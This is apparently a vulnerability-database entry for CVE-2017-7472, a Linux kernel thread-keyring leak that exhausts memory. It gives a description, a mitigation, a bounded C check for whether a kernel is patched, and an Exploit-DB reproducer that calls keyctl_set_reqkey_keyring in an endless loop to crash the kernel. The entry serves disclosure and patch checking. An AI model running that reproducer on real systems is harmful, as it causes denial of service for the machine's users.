Out-of-Memory Vulnerability
Vendor: Linux Kernel
By: Novell Bugzilla
CVSS: 7.8 (HIGH)
CWE: 400
Product Name: Linux Kernel
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2017

CVE-2017-7472

CVE-2017-7472 is an out-of-memory vulnerability in the Linux kernel. It is caused by a bug in the keyctl_set_reqkey_keyring() function, which a program can trigger by calling the function repeatedly with KEY_REQKEY_DEFL_THREAD_KEYRING, as the reproducer at the end of this entry does. The kernel eventually runs out of memory, leading to a denial of service.

Mitigation:

The vulnerability can be mitigated by applying the patch provided by the vendor.
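
To confirm the patch is in effect on a running kernel, the bounded check below (an added example, not part of the original entry or the vendor's code) issues the same keyctl operation a few times and compares the thread keyring's serial number after each call. It assumes, following the upstream fix's description of the bug as a thread keyring leak, that an unpatched kernel installs a fresh thread keyring on every call without releasing the old one; the name thread_keyring_leak_check and the use of raw syscalls with constants copied from <linux/keyctl.h> are choices of this example.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>

/* keyctl(2) values as defined in <linux/keyctl.h>; repeated here so the
 * check builds without libkeyutils. */
#define KEYCTL_GET_KEYRING_ID           0L
#define KEYCTL_SET_REQKEY_KEYRING       14L
#define KEY_SPEC_THREAD_KEYRING         (-1L)
#define KEY_REQKEY_DEFL_THREAD_KEYRING  1L

/* Serial number of the calling thread's keyring, or -1 on error. */
static long thread_keyring_serial(void)
{
	return syscall(SYS_keyctl, KEYCTL_GET_KEYRING_ID,
		       KEY_SPEC_THREAD_KEYRING, 0L);
}

/*
 * Hypothetical helper: makes at most `rounds` calls, so an affected kernel
 * loses only a handful of keyrings.
 * Returns 1 if the thread keyring is replaced between calls (leak present),
 * 0 if the same keyring is reused, -1 if keyctl is unavailable here.
 */
int thread_keyring_leak_check(int rounds)
{
	long first = -1;

	for (int i = 0; i < rounds; i++) {
		if (syscall(SYS_keyctl, KEYCTL_SET_REQKEY_KEYRING,
			    KEY_REQKEY_DEFL_THREAD_KEYRING) < 0)
			return -1;	/* blocked by seccomp, no CONFIG_KEYS, ... */
		long now = thread_keyring_serial();
		if (now < 0)
			return -1;
		if (i == 0)
			first = now;
		else if (now != first)
			return 1;	/* a new keyring replaced the old one */
	}
	return 0;
}

int main(void)
{
	int r = thread_keyring_leak_check(3);
	puts(r == 1 ? "thread keyring replaced on each call: leak present" :
	     r == 0 ? "thread keyring reused: no leak observed" :
		      "keyctl unavailable: cannot tell");
	return r == 1;
}
```

Build with gcc -O2 and run as an unprivileged user; exit status 1 means the kernel still needs the vendor patch.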
Source

Exploit-DB raw data:

/*
Source: https://bugzilla.novell.com/show_bug.cgi?id=1034862
QA REPRODUCER:

gcc -O2 -o CVE-2017-7472 CVE-2017-7472.c -lkeyutils
./CVE-2017-7472

(will run the kernel out of memory)
*/
#include <sys/types.h>
#include <keyutils.h>

int main()
{
	for (;;)
		keyctl_set_reqkey_keyring(KEY_REQKEY_DEFL_THREAD_KEYRING);
}